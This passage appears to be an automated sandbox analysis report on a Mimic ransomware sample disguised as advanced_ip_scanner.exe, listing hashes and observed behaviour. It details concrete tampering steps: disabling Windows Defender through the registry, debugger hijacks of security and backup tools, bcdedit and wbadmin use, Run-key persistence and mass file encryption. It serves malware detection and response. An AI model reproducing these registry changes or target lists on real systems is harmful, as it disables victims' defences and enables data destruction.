Analysis
-
max time kernel
150s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
10-10-2024 09:23
Static task
static1
Behavioral task
behavioral1
Sample
advanced_ip_scanner.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
advanced_ip_scanner.exe
Resource
win10v2004-20241007-en
General
-
Target
advanced_ip_scanner.exe
-
Size
2.6MB
-
MD5
85921539592aeaff3fbe0e104f344db0
-
SHA1
2ca28c946d6632f70c70e555afa8d9a072039d79
-
SHA256
ad640f32617bf57f7b4547fc686cc3e0a9875811ef6be1cb257a0607c391fdb8
-
SHA512
76f07e5d36dabeb56ffc9301cc82c32a975f4e83ad5d165cc8631e1809675011eba85e3d542e8fd2b6b3ae3a9228f4ca5e7ff953fb1446559879c081aa94fbfb
-
SSDEEP
49152:wgwR1ifu1DBgutBPNUF+zTR3HLHaY2UtKvu5vgmAbjNFAF5hcb:wgwR1vguPPocHHfcJbJFAe
Malware Config
Signatures
-
Detects Mimic ransomware 1 IoCs
resource yara_rule behavioral1/files/0x0006000000017472-29.dat family_mimic -
Mimic
Ransomware family was first exploited in the wild in 2022.
-
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "3" DC.exe -
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 840 bcdedit.exe 1788 bcdedit.exe -
Renames multiple (9177) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 1176 wbadmin.exe -
pid Process 2104 wbadmin.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CoreSync.exe BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sqlbrowser.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mspub.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QBDBMgrN.exe BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QBIDPService.exe BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RaccineElevatedCfg.exe BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sqlagent.exe BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SearchIndexer.exe BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SearchApp.exe BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bengien.exe BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dbeng50.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ocomm.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QBDBMgr.exe BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RaccineElevatedCfg.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fbserver.exe BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ocomm.exe BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ocssd.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QBW64.exe BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1cv8.exe BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\benetns.exe BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bengien.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fbguard.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sqlagent.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\benetns.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\encsvc.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VeeamDeploymentSvc.exe BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xfssvccon.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1cv8c.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Sysmon64.exe BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vxmon.exe BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1cv8s.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mydesktopqos.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pvlsvr.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Raccine.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RAgui.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sql.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tasklist.exe BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\logoff.exe BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AutodeskDesktopApp.exe BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\axlbridge.exe BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\axlbridge.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mysqld-nt.exe BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1cv8c.exe BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fbguard.exe BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msaccess.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Raccine_x86.exe BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tomcat6.exe BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vxmon.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sqbcoreservice.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sqlmangr.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Sysmon.exe BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AutodeskDesktopApp.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fdhost.exe BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isqlplussvc.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msftesql.exe BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VeeamDeploymentSvc.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Sysmon.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ocssd.exe BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\raw_agent_svc.exe BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SimplyConnectionManager.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sqlwriter.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tbirdconfig.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" BACHOKTECHET.exe -
Deletes itself 1 IoCs
pid Process 2836 cmd.exe -
Executes dropped EXE 12 IoCs
pid Process 2468 7za.exe 2636 7za.exe 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe 2560 BACHOKTECHET.exe 316 Everything.exe 1756 BACHOKTECHET.exe 2884 BACHOKTECHET.exe 2876 BACHOKTECHET.exe 832 DC.exe 1876 Everything.exe 2356 xdel.exe 212 xdel.exe -
Loads dropped DLL 22 IoCs
pid Process 2464 advanced_ip_scanner.exe 2464 advanced_ip_scanner.exe 2464 advanced_ip_scanner.exe 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 1756 BACHOKTECHET.exe 2884 BACHOKTECHET.exe 2876 BACHOKTECHET.exe 1860 cmd.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe -
Modifies system executable filetype association 2 TTPs 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\exefile\shell\open\command ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\exefile\shell ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Key created \REGISTRY\MACHINE\Software\Classes\exefile\shell\open\command BACHOKTECHET.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\exefile\shell\open\command\ = "\"%1\" %*" BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"%1\" %*" ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\exefile\shell\open\command ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\exefile\shell\open ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\exefile\shell\open\command\ = "\"%1\" %*" ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"%1\" %*" BACHOKTECHET.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\exefile\shell\open\command BACHOKTECHET.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection DC.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BACHOKTECHET = "\"C:\\Users\\Admin\\AppData\\Local\\BFBF5FF3-02FF-66A7-72D2-688544C61A80\\BACHOKTECHET.exe\" " ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BACHOKTECHET.exe = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\README_SOLVETHIS.txt\"" BACHOKTECHET.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: Everything.exe File opened (read-only) \??\S: Everything.exe File opened (read-only) \??\I: Everything.exe File opened (read-only) \??\J: Everything.exe File opened (read-only) \??\N: Everything.exe File opened (read-only) \??\P: Everything.exe File opened (read-only) \??\W: Everything.exe File opened (read-only) \??\V: Everything.exe File opened (read-only) \??\Z: Everything.exe File opened (read-only) \??\N: Everything.exe File opened (read-only) \??\L: Everything.exe File opened (read-only) \??\O: Everything.exe File opened (read-only) \??\R: Everything.exe File opened (read-only) \??\X: Everything.exe File opened (read-only) \??\E: Everything.exe File opened (read-only) \??\S: Everything.exe File opened (read-only) \??\X: Everything.exe File opened (read-only) \??\R: Everything.exe File opened (read-only) \??\G: Everything.exe File opened (read-only) \??\Q: Everything.exe File opened (read-only) \??\A: Everything.exe File opened (read-only) \??\K: Everything.exe File opened (read-only) \??\M: Everything.exe File opened (read-only) \??\Y: Everything.exe File opened (read-only) \??\T: Everything.exe File opened (read-only) \??\B: Everything.exe File opened (read-only) \??\G: Everything.exe File opened (read-only) \??\H: Everything.exe File opened (read-only) \??\K: Everything.exe File opened (read-only) \??\U: Everything.exe File opened (read-only) \??\O: Everything.exe File opened (read-only) \??\P: Everything.exe File opened (read-only) \??\W: Everything.exe File opened (read-only) \??\E: Everything.exe File opened (read-only) \??\I: Everything.exe File opened (read-only) \??\Y: Everything.exe File opened (read-only) \??\U: Everything.exe File opened (read-only) \??\A: Everything.exe File opened (read-only) \??\B: Everything.exe File opened (read-only) \??\H: Everything.exe File opened (read-only) \??\M: Everything.exe File opened (read-only) \??\V: Everything.exe File opened (read-only) \??\Z: Everything.exe File opened (read-only) \??\L: Everything.exe File opened (read-only) \??\Q: Everything.exe File opened (read-only) \??\T: Everything.exe -
Power Settings 1 TTPs 15 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2144 powercfg.exe 2228 powercfg.exe 2724 powercfg.exe 1004 powercfg.exe 2208 powercfg.exe 3020 powercfg.exe 2140 powercfg.exe 2356 powercfg.exe 1380 powercfg.exe 1184 powercfg.exe 1308 powercfg.exe 2640 powercfg.exe 1624 powercfg.exe 2972 powercfg.exe 2912 powercfg.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol DC.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini DC.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Blog.dotx.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File A.txt.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\BCSClientManifest.man.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME04.CSS.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\NUMERIC.JPG.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00669_.WMF.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\clock.js.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\AdjacencyResume.dotx.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\js\picturePuzzle.js.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_widescreen_Thumbnail.bmp.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev.png.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_02.MID.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_ja_4.4.0.v20140623020002.jar.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsImageTemplate.html.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\POWERPNT_K_COL.HXK.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB11.BDR.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_zh_CN.jar.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21370_.GIF.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01852_.WMF.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson_Creek.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_zh_CN.jar.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\mix.gif.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14532_.GIF.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty.png.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single_bkg.png.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\VelvetRose.css.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\PACBELL.NET.XML.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03339_.WMF.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Center.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-j2se-1.3.2.jar.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\RSSFeeds.js.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_on.gif.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\VeriSignLogo.jpg.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18210_.WMF.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00090_.WMF.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Rothera.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_ja_4.4.0.v20140623020002.jar.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\js\calendar.js.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\dotsdarkoverlay.png.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft 